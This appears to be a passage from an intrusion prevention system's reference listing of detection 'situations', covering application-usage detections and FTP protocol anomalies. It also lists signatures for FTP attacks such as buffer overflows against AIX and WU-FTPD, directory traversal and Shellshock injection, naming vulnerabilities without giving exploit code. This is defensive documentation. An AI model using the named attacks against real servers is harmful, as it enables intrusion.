Description: Freightquote delivers a vast array of freight services for a large and diverse customer base. These services enable customers to instantly quote and compare the shipping rates of hundreds of national and regional freight carriers.
Back to top

Frequentis

About this situation: Application Frequentis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Frequentis AG is an international supplier of communication and information systems for control centres with safety-critical tasks.
Back to top

Freshbooks

About this situation: FreshBooks usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: FreshBooks provides small to medium sized businesses an ability to manage invoices.
Back to top

Freshdesk

About this situation: Freshdesk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-768-5211
Description: Freshdesk is a cloud-based software for customer support management.
Back to top

Frevvo

About this situation: Application Frevvo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Frevvo Live Forms offers advanced mobile form and approval workflow builders for all businesses that come with a wide array of features.
Back to top

FriendFeed

About this situation: FriendFeed usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-628-5211
Description: FriendFeed is allows users to build a customised feed made up of content their friends on other collaborative sites have shared.
Back to top

Friendster

About this situation: Friendster usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-628-5211
Description: Friendster is a social gaming website. It provides a platform for members to play online games, contact each other and to share videos and photos.
Back to top

Friendvox

About this situation: FriendVox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This website provides a browser-based instant-messaging client for Facebook users. Source: FriendVox
Back to top

Front-App

About this situation: Application Front-App detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Front is an inbox for teams that allows for great external communication based on seamless internal collaboration.
Back to top

FrontierSoftware

About this situation: Application FrontierSoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FrontierSoftware is a service that allows a Human Resource Management, Payroll Services, HRIS and HR Software.
Back to top

FrontRange

About this situation: Application FrontRange detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FrontRange offer HEAT Cloud Service Management, solution dedicated to assisting the Service Desks and Help Desks of top businesses.
Back to top

FrontStream

About this situation: Application FrontStream detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: FrontStream develops and operates an online donation platform for nonprofit, education, and corporate clients.
Back to top

Fropper.com

About this situation: Fropper.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Frosmo

About this situation: Frosmo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1371-5242
Description: Frosmo is a web advertising and statistic collection service.
Back to top

FrozenMountain

About this situation: Application FrozenMountain detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FrozenMountain is a software company for WebSync, an implementation of the Bayeux Comet protocol for the Microsoft platform
Back to top

Fruux

About this situation: Application Fruux detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: fruux is a unified contacts and calendaring system that works across platforms and devices.
Back to top

FSVps

About this situation: Application FSVps detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FSV Payment Systems is provider of prepaid card program manager and card processor.
Back to top

FTI-Technology

About this situation: Application FTI-Technology detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FTI is a business advisory firm dedicated to helping organizations protect and enhance enterprise value in an increasingly complex legal, regulatory and economic environment.
Back to top

Ftopia

About this situation: Application Ftopia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ftopia harnesses cloud computing to deliver innovative, scalable, secure, and cost-efficient online file-sharing solutions to professionals and businesses.
Back to top

FTP

About this situation: FTP traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1509-5242
Description: FTP is a network protocol used to transfer files over a TCP-based network, such as the Internet.
Back to top

FTP-Data-Port-out-of-Range

About this situation: FTP data connection port out of range
Context: FTP without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Description: An FTP data connection port is outside the configured range.
Back to top

FTP-Validation-Succeeded

About this situation: FTP Protocol has successfully been identified.
Context: Local Correlation
Severity: 1
Tags: System Inspections
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1340-5242
Description: FTP protocol has successfully been identified from the traffic. Related connections can be permitted. If a FTP connection does not produce this situation, related connections will not be permitted.
Back to top

FTP_ACCT-Too-Long-Success

About this situation: FTP ACCT command with too long argument not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP ACCT command that used too long an account. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_ADAT

About this situation: FTP ADAT command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The FTP ADAT command was given. ADAT is one of the FTP security extension commands [RFC 2228]. It is used to exchange authentication and security data. ADAT is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using ADAT in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_ADAT-Argument-Too-Long-Success

About this situation: FTP ADAT command with too long argument not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP ADAT command that used too long an argument. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_ADAT-Success

About this situation: FTP ADAT command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP ADAT command was not refused by the server. ADAT is one of the FTP security extension commands [RFC 2228]. It is used to exchange authentication and security data. ADAT is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using ADAT in some FTP connections. This event was generated because the server did not give an error reply to ADAT command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_ALLO-Too-Big-Success

About this situation: FTP ALLO command with too large allocation size not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP ALLO command that used too large an allocation size. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_AUTH

About this situation: FTP AUTH command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: The FTP AUTH command was given. AUTH is one of the FTP security extension commands [RFC 2228]. It is used to select the security mechanism. AUTH is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using AUTH in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_AUTH-Argument-Too-Long-Success

About this situation: FTP AUTH command with too long argument not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP AUTH command that used too long an argument. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_AUTH-Success

About this situation: FTP AUTH command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: An FTP AUTH command was not refused by the server. AUTH is one of the FTP security extension commands [RFC 2228]. It is used to select the security mechanism. AUTH is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using AUTH in some FTP connections. This event was generated because the server did not give an error reply to AUTH command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Carriage-Return-Nonnull

About this situation: Carriage Return (CR) character not followed by NUL or Linefeed (LF) character
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: A Carriage Return (CR) character was not followed by a NUL or Linefeed (LF) character. The FTP control connection uses Telnet NVT conventions, and therefore a NUL character should be added after a CR character if the CR character is not part of an end-of-line (CRLF). Risk analysis: Risk level is fairly low.
Back to top

FTP_Carriage-Return-Nonnull-Success

About this situation: Server did not refuse command where Carriage Return (CR) character was not followed by NUL or Linefeed (LF) character
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The server did not refuse a command where a Carriage Return (CR) character was not followed by a NUL or Linefeed (LF) character. The FTP control connection uses Telnet NVT conventions, and therefore a NUL character should be added after a CR character if the CR character is not part of a newline (CRLF). This event was generated because the server did not give an error reply to a command where a CR character was not followed by a NUL or a LF character. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_CCC

About this situation: Plain text FTP CCC command detected
Context: FTP without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: A plain text FTP CCC command was detected. CCC is one of the FTP security extensions [RFC 2228]. It is used to switch off the current security mechanism. This can be done, for example, when no security mechanism is needed after authenticating and/or authorizing the client and the server. However, the CCC command itself must be integrity-protected. A plain text CCC command should not appear in a valid FTP session. Risk analysis: Risk level is medium.
Back to top

FTP_CCC-Success

About this situation: Plain text FTP CCC command not refused by server
Context: FTP without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: A plain text FTP CCC command was not refused by the server. CCC is one of the FTP security extensions [RFC 2228]. It is used to switch off the current security mechanism. This can be done, for example, when no security mechanism is needed after authenticating and/or authorizing the client and the server. However, the integrity of the CCC command itself must be protected. A plain text CCC command should not appear in a valid FTP session. This event was generated because the server did not give an error reply to a plain text CCC command. Risk analysis: Risk level is medium. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Characters-Invalid

About this situation: FTP command argument contained invalid characters
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The FTP command argument contained invalid characters. Only characters specified in [RFC 959] and [RFC 2640] should be used in the FTP command arguments Risk analysis: Risk level is fairly low.
Back to top

FTP_Characters-Invalid-Success

About this situation: FTP command argument with invalid characters not refused by server
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP command argument with invalid characters was not refused by the server. Only characters specified in [RFC 959] and [RFC 2640] should be used in the FTP command arguments. This event was generated because the server did not give an error reply to a command with invalid characters in an argument. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Characters-Lower-Case

About this situation: FTP client gave command containing lowercase character(s)
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: The FTP client used a command written (at least partly) in lowercase characters. The FTP specification states that lowercase and uppercase characters in commands are equal. However, since most FTP client programs use uppercase characters in commands, lowercase characters can be considered mildly suspicious, especially in environments where the client programs are known. Risk analysis: Risk level is fairly low.
Back to top

FTP_Characters-Mixed-Case

About this situation: FTP client gave command containing mixed case character(s)
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The FTP client used a command written partly in lowercase characters. The FTP specification states that lowercase and uppercase characters in commands are equal. However, since most FTP client programs use uppercase characters in commands, seeing mixed characters in streams can be considered as suspicious traffic aiming to evade network inspection devices. Risk analysis: Risk level is medium.
Back to top

FTP_Characters-Numeric-Argument-Extra-Whitespace

About this situation: FTP command had extra whitespace character(s) before numeric argument
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP command had extra whitespace character(s) before a numeric argument. Some servers accept whitespace characters before a numeric argument of an FTP command, but since the FTP specification [RFC 959] does not allow any extra whitespace, the implementations vary. The FTP module skips the extra whitespace and generates this event. Risk analysis: Risk level is fairly low.
Back to top

FTP_Characters-Numeric-Argument-Extra-Whitespace-Success

About this situation: FTP server did not refuse FTP command with extra whitespace character(s) before numeric argument
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The FTP server did not refuse an FTP command with extra whitespace character(s) before a numeric argument. Some servers accept whitespace characters before a numeric argument of an FTP command, but since the FTP specification [RFC 959] does not allow any extra whitespace, the implementations vary. The FTP module skips the extra whitespace. This event was generated because the server did not give an error reply to such a command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Client-Stream-Success

About this situation: FTP command with fingerprint match not refused by server
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: A fingerprint matched in the FTP command, but the server did not reject the command. Risk analysis: See the "Severity" log field for the severity of the matching fingerprint. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Client-Syntax-Correct

About this situation: FTP protocol detected
Context: FTP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1481-5242
Description:
Back to top

FTP_CLNT

About this situation: FTP CLNT command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The FTP CLNT command was given. The CLNT command is a non-standard FTP extension that some clients use to identify the client type. The defined policy may forbid using CLNT in some FTP connections.
Back to top

FTP_CLNT-Argument-Too-Long-Success

About this situation: FTP CLNT command with too long argument not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP CLNT command that used too long an argument. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_CLNT-Success

About this situation: FTP CLNT command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP CLNT command was not refused by the server. The CLNT command is a non-standard FTP extension that some clients use to identify the client type. The defined policy may forbid using CLNT in some FTP connections. This event was generated because the server did not give an error reply to the CLNT command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Command-Syntax-Incorrect

About this situation: FTP command used incorrect syntax
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Vulnerability: Freefloat-FTP-Server-Invalid-Command-Buffer-Overflow
Description: An FTP command used incorrect syntax. The FTP module could not fully interpret the command that the client used. The command may be misspelled (if the client is an interactive user instead of an FTP client program), the command may use an extension that is not implemented in the FTP module, or the client may be trying to do something suspicious. Risk analysis: Risk level is medium.
Back to top

FTP_Command-Syntax-Incorrect-Success

About this situation: FTP server did not refuse FTP command that used incorrect syntax
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The FTP server did not refuse an FTP command that used incorrect syntax. The FTP module could not fully interpret the command that the client used. The command may be misspelled (if the client is an interactive user instead of an FTP client program), the command may use an extension that is not implemented in the FTP module, or the client is trying to do something suspicious. This event was generated because the server did not give an error reply to the command that used an incorrect syntax. Risk analysis: Risk level is medium. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Command-Unexpected

About this situation: Unexpected FTP command detected
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An unexpected FTP command was detected. The command should not be given in the current session state. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP state name" shows the current FTP session state. "FTP cmd name" shows the FTP command name.
Back to top

FTP_Command-Unexpected-Success

About this situation: Unexpected FTP command not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The FTP server did not refuse an unexpected FTP command. The command that the client sent should not be given in the current session state. However, the server did not send an error reply to the command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP state name" shows the current FTP session state. "FTP cmd name" shows the FTP command name. "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Command-Unknown

About this situation: Unknown FTP command was detected
Context: FTP without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The FTP inspection module could not recognize the command that the client sent. The command may be misspelled (if the client is an interactive user instead of a FTP client program), the command may be an extension that is not implemented in the FTP inspection module, or the client may be trying to do something suspicious. Risk analysis: Risk varies between low and medium.
Back to top

FTP_Command-Unknown-Success

About this situation: FTP server did not reject unknown FTP command
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The FTP inspection module could not recognize the command that the client sent. The command may be misspelled (if the client is an interactive user instead of a FTP client program), the command may be an extension that is not implemented in the FTP module, or the client may be trying to do something suspicious. This event was generated because the server did not give an error reply to the command. Risk analysis: Risk varies between low and medium. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Command-Whitespace-Before

About this situation: Whitespace character(s) detected before FTP command
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Whitespace character(s) were detected before an FTP command. An FTP client program should not send whitespace characters before the command. An FTP server may, however, skip the whitespace before reading the command. Risk analysis: Risk level is fairly low.
Back to top

FTP_Command-Whitespace-Before-Success

About this situation: Command preceded by whitespace character(s) not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The FTP server did not refuse a command with whitespace character(s) before the command. An FTP client program should not send whitespace characters before the command. An FTP server may, however, skip the whitespace before reading the command. This event was generated because the server did not give an error reply to the command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Command-Whitespace-No-Argument

About this situation: FTP command followed by whitespace with no argument
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An FTP command was followed by a space with no argument. If there is a space after the FTP command name, then there should also be an argument. Risk analysis: Risk level is fairly low.
Back to top

FTP_Command-Whitespace-No-Argument-Success

About this situation: Command followed by whitespace with no argument not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: This event was generated because the server did not give an error reply to an FTP command that was followed by a space with no argument. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Commands-Unprocessed-At-EOF

About this situation: Unanswered commands when FTP control connection terminated
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: There were unanswered commands when the FTP control connection terminated. Normally, an FTP session ends when the client gives the QUIT command and the server answers with an accepting reply. This event was generated because there were one or more unanswered commands when the connection was terminated. Risk analysis: Risk level is fairly low.
Back to top

FTP_CONF

About this situation: FTP CONF command given
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The FTP CONF command was given. CONF is one of the FTP security extension commands [RFC 2228]. It is used to send a confidentiality protected command to the server. CONF is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using CONF in some FTP connections. Risk analysis: Risk level is fairly low.
Back to top

FTP_CONF-Argument-Too-Long-Success

About this situation: FTP CONF command with too long argument not refused
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: This event was generated because the FTP server did not send an error reply to an FTP CONF command that used too long an argument. Risk analysis: Risk varies between low and medium. Very long commands can be used in buffer overflow attacks against the server program. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_CONF-Success

About this situation: FTP CONF command not refused by server
Context: FTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: CONF is one of the FTP security extension commands [RFC 2228]. It is used to send a confidentiality protected command to the server. CONF is a normal FTP command on systems where both the client and the server support the security extensions. The defined policy may forbid using CONF in some FTP connections. This event was generated because the server did not give an error reply to CONF command. Risk analysis: Risk level is fairly low. Most relevant log fields: "FTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

FTP_Connection-Data-Direction-Invalid

About this situation: Data connection opened in the wrong direction
Context: FTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: A data connection was opened in the wrong direction. Either the client opened the data connection when active mode was selected in the control connection, or the server opened the data connection when the passive mode was selected in the control connection. Risk analysis: Risk level is medium. This should not happen in normal FTP sessions.
Back to top

FTP_CS-Ability-Server-Stor-BOF

About this situation: Detects buffer overflow attacks agains Ability Server with long STOR commands
Context: FTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, Ability FTP Server, CVE2004, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: FTP-Ability-Server-Stor-BOF
Description:
Back to top

FTP_CS-Administrator-Login-Attempt

About this situation: Root FTP login attempt detected
Context: FTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic FTP server, Any Operating System not specific, Generic FTP server not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-183-2032
Description:
Back to top

FTP_CS-AIX-BO-Libc-2

About this situation: Aix Ftpd libc buffer overflow
Context: FTP Client Stream
Severity: 10
Tags: AIX, POWER, AIX ftpd, CVE1999, AIX not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-AIX-Ftpd-BOF-Libc
Description:
Back to top

FTP_CS-AIX-Ftpd-BO-Libc

About this situation: Aix ftpd libc buffer overflow
Context: FTP Client Stream
Severity: 10
Tags: AIX, POWER, AIX ftpd, CVE1999, AIX not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-AIX-Ftpd-BOF-Libc
Description:
Back to top

FTP_CS-Anonymous-Login-Attempt

About this situation: Anonymous FTP login attempt detected
Context: FTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic FTP server, Any Operating System not specific, Generic FTP server not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-991-5242
Vulnerability: FTP-Anonymous-Login-Attempt
Description:
Back to top

FTP_CS-Attempted-FTP-Directory-Traversal

About this situation: An attempt at an FTP directory traversal has been detected.
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1503-5242
Vulnerability: PCMan-FTP-Server-Directory-Traversal
BisonFTP-Server-Directory-Traversal
Konica-Minolta-FTP-Utility-Directory-Traversal
Description:
Back to top

FTP_CS-Bash-Shellshock-Code-Injection

About this situation: An attempt to exploit a vulnerability in Bourne Again Shell (bash)
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, bash, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Bash-Shellshock-Code-Injection
Description:
Back to top

FTP_CS-Bash-Shellshock-Code-Injection-2

About this situation: An attempt to exploit a vulnerability in Bourne Again Shell (bash)
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, bash, CVE2014, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Bash-Shellshock-Code-Injection
Description:
Back to top

FTP_CS-Bin-Ls-BOF

About this situation: Possible buffer overflow attempt in bin/ls
Context: FTP Client Stream
Severity: 2
Tags: Unix, Any Hardware, Generic FTP server, CVE2003, Unix not specific, Generic FTP server not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: FTP-Bin-Ls-BOF
Description:
Back to top

FTP_CS-BOF-Cwd

About this situation: Cwd buffer overflow against x86 linux
Context: FTP Client Stream
Severity: 10
Tags: Linux, x86, WU-FTPD, ProFTPD, BeroFTPD, CVE1999, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-BOF-ProFTPD-WU-FTPD
Description:
Back to top

FTP_CS-BOF-Mkd-5

About this situation: Mkd buffer overflow against x86 linux
Context: FTP Client Stream
Severity: 10
Tags: Linux, x86, WU-FTPD, ProFTPD, BeroFTPD, CVE1999, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-BOF-ProFTPD-WU-FTPD
Description:
Back to top

